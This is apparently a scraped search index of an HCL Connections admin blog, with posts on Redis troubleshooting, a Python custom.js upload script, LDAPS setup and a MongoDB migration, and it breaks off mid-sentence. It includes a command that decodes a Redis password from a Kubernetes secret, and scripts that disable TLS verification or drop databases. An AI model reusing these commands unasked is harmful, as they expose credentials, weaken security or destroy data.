orient-me-collection_tmp ZsxezJzCSV2aeb8I4rxYfg 3 2 0 0 1.8kb 624b green open .opendistro_security FRHNF_XNTeSwcvpvK7-Skg 1 2 10 0 219.2kb 73kb green open orient-me-collection a2bPe_zCSkOQYhSqxcbDUQ 1 1 164 5 273.5kb 155.4kb In the last line, we see that the orient-me-collection, the 8th column with 164 needs to increase when new events appear. When you create a community, for example, this number should increase after a few seconds.\nTo check if the data is sent to Component Pack, you can check the Redis queue. You can open a shell on redis-server-0 and use redis-cli. Alternativly you can use telnet or netcat on any host to open a session on port 30379 on your Haproxy (connections-automation installs an haproxy on the Nginx host) or Kubernetes worker.\nnc \u0026lt;haproxy or k8s-worker\u0026gt; 30379 To connect, you need your redis-password:\nkubectl get secret redis-secret --template={{.data.secret}} | base64 -d Example:\n1 2 3 4 5 6 7 8 9 10 nc cnx8-db2.stoeps.home 30379 auth your-redis-password +OK subscribe connections.events *3 $9 subscribe $18 connections.events :1 Now create a community and check if messages appear in this nc session.\nThe article Verify Redis server traffic adds some more details on this topic.\nIf nothing happens in Redis, check the Gatekeeper settings at https://cnx-url/connections/config/highway.main.settings.tiles\nThe value for c2.export.redis.pass is ~@64 + the base64 encoded password.\nThere is a configure script in the Connections Automation repository - Redis Config , which does not update the Gatekeeper directly, but adds some update JSON files to the folder shared directory/configuration/update.\nTo make a long story short, in all three systems, the connection to Redis was somehow broken. I assume that during data migration, the gatekeeper settings were overwritten.\nAfter checking the hostname, port and password, I restarted the environment, and Top Updates started showing updates.\n","excerpt":"\u003cp\u003eLast week, I had three systems with issues displaying the Top Updates in the Orient Me. So I tried to find out which applications and containers are involved in generating the content for this view.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/troubleshooting-topupdates/","title":"Troubleshooting Top Updates in HCL Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/updates/","title":"Updates,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engagement-center/","title":"Engagement Center"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/engagementcenter/","title":"Engagementcenter"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engagementcenter/","title":"Engagementcenter"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcec/","title":"Hcec"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcec/","title":"Hcec,"},{"body":"With HCL Connections 6.5 and later, we got the add-on HCL Connections Engagement Center (aka CEC, HCEC, ICEC or XCC) included in a normal HCL Connections deployment.\nThe HCL Connections license contains the supplement that HCEC can be used within Communities and is the base for the Highlights application. All other options are hidden and could be enabled in LotusConnections-config.xml (set \u0026lt;genericProperty name=\u0026quot;icec.light\u0026quot;\u0026gt;false\u0026lt;/genericProperty\u0026gt;), but then you need to order the HCL Connections Engagement Center license.\nNow, the users with the admin role in ICEC (ISC - Enterprise Applications \u0026gt; ICEC \u0026gt; Security role to user/group mapping) are allowed to use the dialog or API to upload a file.\nI\u0026rsquo;m not responsible for your licenses! Do not enable the full version if you aren\u0026rsquo;t allowed to.\nAs long as icec.light is set to true, you have no option to add a customized JavaScript file with additional widgets or to hide some of the default widgets of HCEC.\nThis is documented in \u0026ldquo;Include custom.js\u0026rdquo; and \u0026ldquo;Creating a custom widget with the custom widget API\u0026rdquo; .\nThe customization files for HCEC are stored in the XCC database, so there is no option to just upload a file to the customization folder in your shared directory or use the customizer to achieve this. You can download the file from your database, it is stored in a BLOB field in XCC.XCCFILESTORAGE.\nFrom a DevOps perspective, we want to automate as much as possible, so adding this customization manually is boring and could cause errors. Since HCEC is integrated, I wish to build a script to update custom.js, without enabling the full version of HCEC.\nIn my example, I intend to hide the birthday widget and the new Leap widgets, as we haven\u0026rsquo;t deployed the Leap application in this environment. To be honest, I would expect that you could select the shown widgets somewhere, but until now, they have just been added, but there is no option to hide some of them.\nThe used custom.js in the database and the documentation contains some examples for custom widgets, but this is not necessary for the functionality or our goal to hide some widgets.\nSo I created a new file with this content:\n1 2 3 4 5 6 7 8 9 10 (function (W) { XCC.X = XCC.X || { init : function() { /* Hide widgets */ [\u0026#39;xccLeapForm\u0026#39;, \u0026#39;xccLeapResults\u0026#39;, \u0026#39;xccPeopleBirthday\u0026#39;].forEach(function removeWidgt(widgetName) { XCC.WIDGETS.TYPES[widgetName] = undefined; }); } }; }(window)); In lines 4 to 6, we set the list of widgets to undefined, so they do not appear in the list of available widgets.\nExample of widget names in browser developer tools The easiest way to find the widget name is to use the browser developer tools and use the ID of the widget.\nNow we need to upload the file to HCEC. The official upload link is only visible for users with the Admin role in ICEC and when icec.light is set to false. I traced the requests and created a script to upload the file from Python.\nThe requirement is that the used user credentials have the admin role ICEC, but it is not necessary that icec.light is set to false.\n\u0026#34;\u0026#34;\u0026#34; Author: Christoph Stoettner Mail: christoph.stoettner@stoeps.de Commandline script to upload custom.js to HCL Engagement Center This even works when icec.light = true \u0026#34;\u0026#34;\u0026#34; import sys import requests import os.path import time import urllib3 urllib3.disable_warnings() if len(sys.argv) != 5: raise ValueError( \u0026#34;Please provide hostname user password community-uuid and the upload filename.\\nExample: %s hostname username password custom.js\u0026#34; % sys.argv[0] ) else: cnx_host = sys.argv[1] cnx_user = sys.argv[2] cnx_pass = sys.argv[3] upload_file_name = sys.argv[4] if os.path.exists(upload_file_name): pass else: print(\u0026#34;The filename \u0026#34; + upload_file_name + \u0026#34; does not exist.\u0026#34;) sys.exit() cnx_root_url = \u0026#34;https://\u0026#34; + cnx_host headers = {} login_url = cnx_root_url + \u0026#34;/homepage/j_security_check\u0026#34; get_csrf_url = cnx_root_url + \u0026#34;/xcc/community\u0026#34; session = requests.Session() login_data = {\u0026#34;j_username\u0026#34;: cnx_user, \u0026#34;j_password\u0026#34;: cnx_pass} login_response = session.post(login_url, data=login_data, verify=False) if login_response.status_code == 200: # Create a community and delete it after getting the CSRF Token create_comm_url = cnx_root_url + \u0026#34;/communities/service/atom/communities/my\u0026#34; headers[\u0026#34;Content-Type\u0026#34;] = \u0026#34;application/atom+xml\u0026#34; comm_name = f\u0026#34;Test for Highlights upload custom.js -- {int(time.time())}\u0026#34; data = ( \u0026#39;\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt;\u0026lt;entry xmlns=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:app=\u0026#34;http://www.w3.org/2007/app\u0026#34; xmlns:snx=\u0026#34;http://www.ibm.com/xmlns/prod/sn\u0026#34;\u0026gt;\u0026lt;title type=\u0026#34;text\u0026#34;\u0026gt;\u0026#39; + comm_name + \u0026#39;\u0026lt;/title\u0026gt;\u0026lt;summary type=\u0026#34;text\u0026#34;\u0026gt;ignored\u0026lt;/summary\u0026gt;\u0026lt;content type=\u0026#34;html\u0026#34;\u0026gt;This should be deleted within one minute\u0026lt;/content\u0026gt;\u0026lt;published\u0026gt;ignored\u0026lt;/published\u0026gt;\u0026lt;category term=\u0026#34;community\u0026#34; scheme=\u0026#34;http://www.ibm.com/xmlns/prod/sn/type\u0026#34;\u0026gt;\u0026lt;/category\u0026gt;\u0026lt;snx:communityType\u0026gt;public\u0026lt;/snx:communityType\u0026gt;\u0026lt;/entry\u0026gt;\u0026#39; ) create_comm_response = session.post( create_comm_url, data=data, headers=headers, verify=False ) if create_comm_response.status_code == 201: community_created = create_comm_response.headers[\u0026#34;Location\u0026#34;] community_created_uuid = community_created.split(\u0026#34;=\u0026#34;)[1] json_data = {} print(\u0026#34;Community successfully created:\u0026#34; + community_created_uuid) json_data[\u0026#34;commId\u0026#34;] = community_created_uuid headers = { \u0026#34;User-Agent\u0026#34;: \u0026#34;Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0\u0026#34;, \u0026#34;Accept\u0026#34;: \u0026#34;*/*\u0026#34;, \u0026#34;Accept-Language\u0026#34;: \u0026#34;en-US,en;q=0.5\u0026#34;, \u0026#34;Accept-Encoding\u0026#34;: \u0026#34;gzip, deflate\u0026#34;, \u0026#34;Content-Type\u0026#34;: \u0026#34;application/json; charset=utf-8\u0026#34;, } headers[\u0026#34;Origin\u0026#34;] = cnx_root_url headers[\u0026#34;Referer\u0026#34;] = ( cnx_root_url + \u0026#34;/communities/service/html/communityoverview?communityUuid=\u0026#34; + community_created_uuid ) get_csrf_response = session.post( get_csrf_url, headers=headers, json=json_data, verify=False ) # Store csrf_token_icec for later csrf_token = session.cookies.get_dict()[\u0026#34;csrf_token_icec\u0026#34;] upload_path = \u0026#34;/xcc/rest/files/upload\u0026#34; upload_url = cnx_root_url + upload_path headers[\u0026#34;Accept\u0026#34;] = \u0026#34;application/json, */*; charset=utf8\u0026#34; headers[\u0026#34;X-Requested-With\u0026#34;] = \u0026#34;XMLHttpRequest\u0026#34; headers[\u0026#34;X-Token-Icec\u0026#34;] = csrf_token # Remove Content-Type (is added during update) headers.pop(\u0026#34;Content-Type\u0026#34;) files = { \u0026#34;files[]\u0026#34;: (\u0026#34;custom.js\u0026#34;, open(upload_file_name), \u0026#34;application/x-javascript\u0026#34;) } upload_response = session.post( upload_url, files=files, headers=headers, verify=False ) # Handle the response as needed if upload_response.status_code == 200: print(\u0026#34;Uploaded successfully\u0026#34;) else: print(\u0026#34;Upload failed\u0026#34;) print(\u0026#34;\\n**** request headers ****\u0026#34;) # print(upload_response.request.headers) for key in upload_response.request.headers.keys(): print(key + \u0026#34;: \u0026#34; + upload_response.request.headers[key]) print(\u0026#34;\\n**** request body ****\u0026#34;) print(upload_response.request.body[:400]) print(\u0026#34;\\n**** response content ****\u0026#34;) print(upload_response.status_code, upload_response.content[:400]) # Delete community (delete twice to remove from Trash) delete_comm_response = session.delete( cnx_root_url + \u0026#34;/communities/service/atom/community/instance?communityUuid=\u0026#34; + community_created_uuid, verify=False ) delete_comm_response2 = session.delete( cnx_root_url + \u0026#34;/communities/service/atom/community/instance?communityUuid=\u0026#34; + community_created_uuid, verify=False ) if delete_comm_response.status_code == 200: print(\u0026#34;Temporary created community deleted: \u0026#34; + community_created_uuid) if delete_comm_response2.status_code == 200: print( \u0026#34;Temporary created community removed from trash: \u0026#34; + community_created_uuid ) else: print(f\u0026#34;Temporary community couldn\u0026#39;t be deleted: {community_created}\\nCommunity Name: {comm_name}\u0026#34;) else: print(\u0026#34;Community not created: \u0026#34; + str(create_comm_response.status_code)) else: print(\u0026#34;Login failed!\u0026#34;) # Close the session session.close() For the file upload we need a cookie from HCEC which is later provided as header X-Token-Icec.\nThe Python script uses requests and urllib3, so please install them before using the script:\npip3 install requests urllib3 I wrote the script to automate the task with Ansible, so I just use the sys.argv variables during the call. When you have the config.js and this script in the same directory, you can call them with:\npython3 upload_customjs.py \u0026lt;your connections hostname\u0026gt; \u0026lt;admin user\u0026gt; \u0026lt;admin password\u0026gt; \u0026lt;file to upload\u0026gt; python3 upload_customjs.py cnx8-db2.stoeps.home stoeps password custom.js There is no need to name the file custom.js, you can use any name; the script uploads as custom.js.\nExample upload. Update In the first version of this blog post you had to add a community uuid to do the csrf token call. I changed this and create a community during the upload and delete it immediatly after uploading the custom.js file.\nUpdate 2025-02-17 Adjusted the upload script and add verfiy=False to the delete statements. The script failed when the community name is already present, so I added a timestamp to the communityname, so it can create the community, but it can happen that a community needs manual deletion then.\n","excerpt":"\u003cp\u003eWith HCL Connections 6.5 and later, we got the add-on HCL Connections Engagement Center (aka CEC, HCEC, ICEC or XCC) included in a normal HCL Connections deployment.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/hide_hcec_widgets/","title":"Hide widget from Highlights"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/icec/","title":"Icec"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/icec/","title":"Icec,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/xcc/","title":"Xcc"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/xcc/","title":"Xcc,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ad/","title":"Ad,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ldaps/","title":"Ldaps"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/sdi/","title":"Sdi,"},{"body":"I had one Connections\u0026rsquo; environment that I wanted to switch from OpenLDAP to Active Directory LDAP. The old OpenLDAP environment used LDAPS to connect, and so I assumed that the change was done quickly.\nThe first step was to make a copy of the tdisol folder I used for OpenLDAP and start changing the configuration files for the new LDAP server.\nNow we need to import the certificate used for LDAPS. You can use keytool, Keystore Explorer or openssl to get the SSL certificate from the server and store it into a JKS keystore.\nopenssl s_client -showcerts -connect ad-server-hostname:636 \u0026lt; /dev/null \u0026gt; temp-key.out openssl x509 -outform DER \u0026lt; temp-key.out \u0026gt; temp-key.der openssl x509 -inform der -in temp-key.der -out temp-key.pem /opt/IBM/TDI/V7.0/jvm/jre/bin/keytool -import -alias ldap-certificate -keystore ldapcerts.jks -file temp-key.pem This asks you for a keystore password and if you want to trust the certificate.\nExample [root@cnx8-db2-db ad_ldaps]# openssl s_client -showcerts -connect dc1.win.stoeps.home:636 \u0026lt; /dev/null \u0026gt; temp-key.out depth=0 CN = DC1.WIN.STOEPS.HOME verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 CN = DC1.WIN.STOEPS.HOME verify error:num=21:unable to verify the first certificate verify return:1 depth=0 CN = DC1.WIN.STOEPS.HOME verify return:1 DONE [root@cnx8-db2-db ad_ldaps]# openssl x509 -outform DER \u0026lt; temp-key.out \u0026gt; temp-key.der [root@cnx8-db2-db ad_ldaps]# openssl x509 -inform der -in temp-key.der -out temp-key.pem [root@cnx8-db2-db ad_ldaps]# /opt/IBM/TDI/V7.20/jvm/jre/bin/keytool -import -alias ldap-certificate -keystore ldapcerts.jks -file temp-key.pem Enter keystore password: Re-enter new password: Owner: CN=DC1.WIN.STOEPS.HOME Issuer: CN=WIN-DC1-CA, DC=WIN, DC=STOEPS, DC=HOME ... Trust this certificate? [no]: yes Certificate was added to keystore Now add the new keystore to solution.properties in the tdisol directory.\nThe example solution.properties has the trustStore configuration, which just needs to be uncommented.\n... ## server authentication #javax.net.ssl.trustStore=key.jks #{protect}-javax.net.ssl.trustStorePassword= #javax.net.ssl.trustStoreType=jks # by default the server API is not used. api.on=false For my newly created keystore I added the following.\njavax.net.ssl.trustStore=ldapcerts.jks {protect}-javax.net.ssl.trustStorePassword={encr}VK/JddYbHYHDbjQ/jO91wvVJ0howxCge2Ded409WgNRoQq1JHsEMKnZa1OuWSmgnoNwUnRRTQpr9v3lbvwFSULLAUjZTClD5jkgHeHTU/dUE0OXtsSlK+gBaIOBF9IZqybZJF1hlnuWsZx29gshwY2wANrIkgzmpWYs55XwdC9A= javax.net.ssl.trustStoreType=jks We will later see that this is the issue here, but these three lines are enough to get a working TDI SSL connection to Domino LDAP or OpenLDAP.\nAdjust the server and the bind user I adjusted profiles_tdi.properties and ran collect_dns.sh to check the LDAP connection.\nChanged values in profiles_tdi.properties:\nsource_ldap_url=ldap://dc1.win.stoeps.home:636 source_ldap_search_base=dc=win,dc=stoeps,dc=home source_ldap_search_filter=(objectclass=Person) source_ldap_user_login=CN=Bind LDAP,OU=Stoeps Users,DC=WIN,DC=STOEPS,DC=HOME {protect}-source_ldap_user_password=\u0026lt;password of the bind user\u0026gt; Double check that SSL is enabled:\nsource_ldap_use_ssl=true Running collect_dns.sh failed with the message simple bind failed.\nError message in ibmdi.log 2023-11-02 12:36:34,931 INFO [AssemblyLine.AssemblyLines/_internal_ldap_iterate] - [ldap_iterate] CTGDJQ001I Using LDAP SSL connection. Ensure TCP port number is changed accordingly. 2023-11-02 12:36:35,162 ERROR [AssemblyLine.AssemblyLines/_internal_ldap_iterate] - [ldap_iterate] CTGDIS181E Error while evaluating Hook \u0026#39;On Error\u0026#39; in the Component \u0026#39;ldap_iterate\u0026#39; (ldap_iterate.initialize_fail). javax.naming.CommunicationException: simple bind failed: dc1.win.stoeps.home:636 at com.sun.jndi.ldap.LdapClient.authenticate(LdapClient.java:231) ~[?:1.8.0] My first change was to check if the credentials and server information were valid. So I set:\nsource_ldap_url=ldap://dc1.win.stoeps.home:389 source_ldap_use_ssl=false Without SSL, I was able to connect to AD LDAP and synchronize the users, but I wanted to get it working with SSL. Starting with some tracing (after enabling SSL again) in solution.properties:\n... javax.net.debug=all Running collect_dns.sh again produces a lot of debug output. The most important part is:\njavax.net.ssl|FINE|1C|Thread-3|2023-11-02 12:36:35.149 UTC|Thread.java:1178|Produced client Certificate handshake message ( \u0026#34;Certificates\u0026#34;: [ \u0026#34;certificate\u0026#34; : { \u0026#34;version\u0026#34; : \u0026#34;v3\u0026#34;, \u0026#34;serial number\u0026#34; : \u0026#34;45 01 B2 CD\u0026#34;, \u0026#34;signature algorithm\u0026#34;: \u0026#34;MD5withRSA\u0026#34;, \u0026#34;issuer\u0026#34; : \u0026#34;CN=API Admin, OU=test, O=test, L=test, ST=test, C=US\u0026#34;, \u0026#34;not before\u0026#34; : \u0026#34;2006-09-08 18:13:33.000 UTC\u0026#34;, \u0026#34;not after\u0026#34; : \u0026#34;2010-09-07 18:13:33.000 UTC\u0026#34;, \u0026#34;subject\u0026#34; : \u0026#34;CN=API Admin, OU=test, O=test, L=test, ST=test, C=US\u0026#34;, \u0026#34;subject public key\u0026#34; : \u0026#34;RSA\u0026#34;} ] I wondered about this user, but after some research and checking serverapi/testadmin.jks, I found an expired API Admin user, and it seems that TDI tries to send his client certificate to the AD LDAP server. AD does not accept the user (because the user is unknown, expired and uses an old signature algorithm).\nWhen we open the file serverapi/testadmin.jks we find an expired user CN=API Admin, OU=test, O=test, ST=test, C=US, but why does TDI try to use this certificate?\nScreenshot with ikeyman Some internet searches later, I found the post from Robert Farstad TDI/SDI - Connect to AD over SSL and Michael Urspringer IBM Connections 4: Connect TDI to Secure LDAP server via SSL .\nBoth added a keystore and a truststore to their tdisol folder, I did just the trustStore. So the keyStore gets inherited from global.properties which points to serverapi/testadmin.jks.\nSolution So I changed my solution.properties to:\n... # Truststore javax.net.ssl.trustStore=ldapcerts.jks {protect}-javax.net.ssl.trustStorePassword={encr}VK/JddYbHYHDbjQ/jO9... javax.net.ssl.trustStoreType=jks # KeyStore (can use the same key store as the trustStore!) javax.net.ssl.keyStore=ldapcerts.jks {protect}-javax.net.ssl.keyStorePassword={encr}VK/JddYbHYHDbjQ/jO9... javax.net.ssl.keyStoreType=jks and ran collect_dns.sh again. Now the collect.dns gets created and contains users, and the next check with sync_all_dns.sh is successfully synchronizing the AD users to Connections profilesDB.\nI assume that AD asks optionally for a client certificate, and as there is one present in the keystore, TDI tries to send it.\n","excerpt":"\u003cp\u003eI had one Connections\u0026rsquo; environment that I wanted to switch from OpenLDAP to Active Directory LDAP. The old OpenLDAP environment used LDAPS to connect, and so I assumed that the change was done quickly.\u003c/p\u003e\n\u003cp\u003eThe first step was to make a copy of the tdisol folder I used for OpenLDAP and start changing the configuration files for the new LDAP server.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/sdi-connect-to-ad-ldaps/","title":"Security Directory Integrator connecting to Active Directory LDAPS"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tdi/","title":"Tdi"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tdi/","title":"Tdi,"},{"body":"The official documentation, \u0026ldquo;Migrating data from MongoDB 3 to 5\u0026rdquo;, wants to dump the MongoDB databases in 3.6 and then restore this data into the newly deployed MongoDB 5.\nOne issue with this process is that we can\u0026rsquo;t run the two MongoDB versions in parallel on Kubernetes because the provided helm charts and container for MongoDB 3.6 stop running after Kubernetes 1.21. On the other side, the helm chart providing MongoDB 5 can\u0026rsquo;t be installed on those old Kubernetes versions. So the process to update is:\nMigration process Dump databases in MongoDB 3.6 (version delivered with Connections 7) Update Kubernetes to 1.25 or 1.27 Restore MongoDB databases to version 5.0 So, you have to plan the process in advance because it is difficult to get the data when you forget something.\nUpdate Kubernetes The process of updating Kubernetes from 1.21 to 1.27 is quite a challenge because you have to jump from version to version: 1.21 → 1.22 → 1.23 → 1.24 → 1.25 → 1.26 → 1.27. Or you destroy your Kubernetes deployment and just create a new one with Kubernetes 1.27.\nCreate database dumps I started dumping the databases and found that these 50 GB (it is a large environment) of MongoDB databases will need about three days until the dump is finished. We estimated the restoration to take three to four days. This results in a migration time of at least one week, and there is no migration possible of the data created in the databases during this week. Nobody can shut down their Connections\u0026rsquo; environment for multiple days, so we required another solution.\nA case at HCL wasn\u0026rsquo;t helpful at all, and in the end I started reading the MongoDB documentation and tested some options.\nI learned that we can migrate the data in-place, but the process is updating in a row 3.6 → 4.0 → 4.2 → 4.4 → 5.0. The documentation recommends updating the database binaries, set the compatibility version, shutdown the database and going to the next version. The databases are stored in NFS shares, so in my opinion, the easiest way is to use some Docker containers and mount the database directory to these containers.\nAnother option would be to add new members to the replicaSet, but this would need some code adjustments in the pods. These changes I wanted to avoid and as I already wrote, this would need adjustments in the helm charts deploying MongoDB.\nGet the MongoDB 3.6 data to the 5.0 shares I\u0026rsquo;m not responsible for your data or provide support for this process!\nI tested these steps in multiple environments and until now, everything works flawlessly, but use this information at your own risk!\nMy first try was copying the shares mongo-node-{0,1,2} to the new ones mongo5-node-{0,1,2}, but this means nearly 150 GB of data copied over NFS.\nCopying the database data to a NFS requires some time, so my next step was moving the data from the mongo-node-{0,1,2} shares to mongo5-node-{0,1,2}. Moving data is way faster than copying them, but you should have a backup or snapshot.\nBackup mongo-node shares tar the data of MongoDB, this is faster than copying it.\ncd /pv-connections tar cvzf backup-$date +%Y-%m-%d-mongo36.tar.gz mongo-node-? Move data on NFS share cd /pv-connections for i in 0 1 2 # Backup mongo5 folder if [ -d mongo5-node-${i}]; then mv mongo5-node-${i} mongo5-node-${i}-old fi mv mongo-node-${i} mongo5-node-${i} done Migrate databases I used podman installed on the NFS Server to migrate the databases, but you can mount the shares to any other machine with Docker or podman.\nSteps We have to start with MongoDB 3.6 because Connections 7 has set CompatibiltyVersion = 3.4!\nPull image podman pull docker.io/bitnami/mongodb:3.6 Run container This command expects that you are in the /pv-connections/mongo5-node-0 folder.\npodman run -dt --name mongo36 -p 27017:27017 -v $(pwd)/data/db:/bitnami/mongodb/data/db:Z docker.io/bitnami/mongodb:3.6 Remove the replicaset (only for 3.6) The new statefulSet in MongoDB 5 uses new hostnames, so it is necessary to remove the old hostname from the replicaset.\nI run the following commands via docker or podman exec, but you can use mongosh too and run the commands one after another in shell. I wanted to automate the process, this is easier with single commands via podman exec.\npodman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;local\u0026#39;).system.replset.remove()\u0026#34; Drop userprefs-service database (only for 3.6) This database is no longer used and can be deleted.\npodman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;use userprefs-service\u0026#34; --eval \u0026#34;db.dropDatabase()\u0026#34; Update CompatibiltyVersion podman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;db.adminCommand( { setFeatureCompatibilityVersion: \u0026#39;3.6\u0026#39; } )\u0026#34; Shutdown database Server podman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;admin\u0026#39;).shutdownServer()\u0026#34; Stop the container and remove it podman stop mongo36 podman rm mongo36 That\u0026rsquo;s almost it, but you have to do the same process in all 3 mongo5-node-{0,1,2} shares and for the other MongoDB versions.\nUse a Shell Script for the migration This script expects that you already moved the old mongo-node folders to mongo5-node.\nUsing podman #!/usr/bin/env bash # Author: Christoph Stoettner # Date: 2023-09-22 # Copyright: Vegard IT GmbH / Christoph Stoettner # This script expects the mongo 3.6 databases in the mongo5 shares # I recommend to move mongo-node-x to mongo5-node-x because copy needs too long NFS_ROOT=/pv-connections for i in 3.6 4.0 4.2 4.4 5.0; do podman pull docker.io/bitnami/mongodb:${i} container=mongo$(echo $i | tr -d .) for j in 0 1 2; do cd ${NFS_ROOT}/mongo5-node-$j podman run -dt --name ${container} -p 27017:27017 -v $(pwd)/data/db:/bitnami/mongodb/data/db:Z docker.io/bitnami/mongodb:${i} sleep 15 # Update CompatibiltyVersion to next version podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;db.adminCommand( { setFeatureCompatibilityVersion: \u0026#39;${i}\u0026#39; } )\u0026#34; if [ ${i} -eq \u0026#34;3.6\u0026#34; ] ; then # Remove replicaset definition from database local podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;local\u0026#39;).system.replset.remove()\u0026#34; podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;use userprefs-service\u0026#34; --eval \u0026#34;db.dropDatabase()\u0026#34; fi # Stop mongodb databases podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;admin\u0026#39;).shutdownServer()\u0026#34; podman stop ${container} podman rm ${container} done done Using Docker #!/usr/bin/env bash # Author: Christoph Stoettner # Copyright: Vegard IT GmbH # Date: 2023-09-21 # This script expects the MongoDB 3.6 databases in the mongo5 shares # I recommend to move mongo-node-x to mongo5-node-x, because copy needs too long NFS_ROOT=/pv-connections for i in 3.6 4.0 4.2 4.4 5.0; do docker pull bitnami/mongodb:${i} container=mongo$(echo $i | tr -d .) for j in 0 1 2; do cd ${NFS_ROOT}/mongo5-node-$j || exit echo \u0026#34;[Start ${i}] - Start container ${container} in mongo5-node-${j}\u0026#34; docker run -d -t --name \u0026#34;${container}\u0026#34; -p 27017:27017 -v \u0026#34;$(pwd)/data/db\u0026#34;:/bitnami/mongodb/data/db bitnami/mongodb:${i} sleep 30 CMD=mongosh if [ ${i} == \u0026#34;3.6\u0026#34; ] ; then # Image 3.6 has no mongosh CMD=mongo elif [ ${i} == \u0026#34;4.0\u0026#34; ]; then # Image 4.0 has no mongosh CMD=mongo elif [ ${i} == \u0026#34;4.2\u0026#34; ]; then # Delete database userprefs-service echo \u0026#34;Delete database userprefs-service\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD userprefs-service --quiet --eval \u0026#39;db.dropDatabase(); quit();\u0026#39; echo \u0026#34;Delete ReplicaSet\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD local --quiet --eval \u0026#39;db.system.replset.deleteOne({\u0026#34;_id\u0026#34;:\u0026#34;rs0\u0026#34;}); quit();\u0026#39; echo \u0026#34;Delete Transactions\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD config --quiet --eval \u0026#39;db.transactions.remove({}); quit();\u0026#39; fi # Update CompatibiltyVersion to next version until docker exec \u0026#34;${container}\u0026#34; $CMD --quiet --eval \u0026#34;db.adminCommand( { setFeatureCompatibilityVersion: \u0026#39;${i}\u0026#39; } )\u0026#34;; do echo \u0026#34;Update FeatureCompatibilityVersion to ${i}\u0026#34; echo \u0026#34;Remove transactions\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD config --quiet --eval \u0026#39;db.transactions.remove({}); quit();\u0026#39; sleep 10 done # Stop mongodb databases echo \u0026#34;Stop mongod\u0026#34; if [ ${i} == \u0026#34;3.6\u0026#34; ] || [ ${i} == \u0026#34;4.0\u0026#34; ]; then docker exec \u0026#34;${container}\u0026#34; $CMD --quiet --eval \u0026#34;db.getSiblingDB(\u0026#39;admin\u0026#39;).shutdownServer()\u0026#34; else docker exec \u0026#34;${container}\u0026#34; $CMD admin --quiet --eval \u0026#39;db.shutdownServer(); quit();\u0026#39; fi echo \u0026#34;Stop container ${container} in mongo5-node-${j}\u0026#34; docker stop \u0026#34;${container}\u0026#34; echo \u0026#34;Delete container\u0026#34; docker rm \u0026#34;${container}\u0026#34; done echo \u0026#34;[Stop ${i}] - All datastores updated\u0026#34; done After running this script, just follow the documented migration path and install/update Kubernetes and Component Pack.\nJust for comparison, this process with podman pull command (download the Bitnami images from Docker Hub) runs about 15 to 20 minutes and the 50 GB databases are migrated. After starting the new Mongo5 statefulset, the replicaSet config is automatically reapplied and working.\n","excerpt":"\u003cp\u003eThe \u003ca href=\"https://opensource.hcltechsw.com/connections-doc/v8-cr3/admin/install/migrating_data_mongodb_v3_v5.html\" target=\"_blank\"\u003eofficial documentation, \u0026ldquo;Migrating data from MongoDB 3 to 5\u0026rdquo;, \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n wants to dump the MongoDB databases in 3.6 and then restore this data into the newly deployed MongoDB 5.\u003c/p\u003e\n\u003cp\u003eOne issue with this process is that we can\u0026rsquo;t run the two MongoDB versions in parallel on Kubernetes because the provided helm charts and container for MongoDB 3.6 stop running after Kubernetes 1.21. On the other side, the helm chart providing MongoDB 5 can\u0026rsquo;t be installed on those old Kubernetes versions. So the process to update is:\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/migrate-mongodb-data-for-cp/","title":"Migrate MongoDB in HCL Connections Component Pack 8"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/mongodb/","title":"Mongodb"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/conference/","title":"Conference"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/conference/","title":"Conference,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/foss/","title":"Foss"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/foss/","title":"Foss,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/froscon/","title":"Froscon"},{"body":"Last week I attended FrOSCon[https://froscon.org], a yearly conference about Free and Open-Source software, organized by the computer science department of the University of Applied Sciences Bonn-Rhein-Sieg.\nI had the honor to do two sessions. This time I did them in German, both are recorded by the marvelous c3voc .\nThis was my forth FroSCon, and it was like coming home. It began with a nice dinner with some new and old friends on the day before the event. The first conference day I had the first slot after the opening session and I felt somehow nervous. But with a very kind introduction by Henning Rohde (Thanks Henning, for the 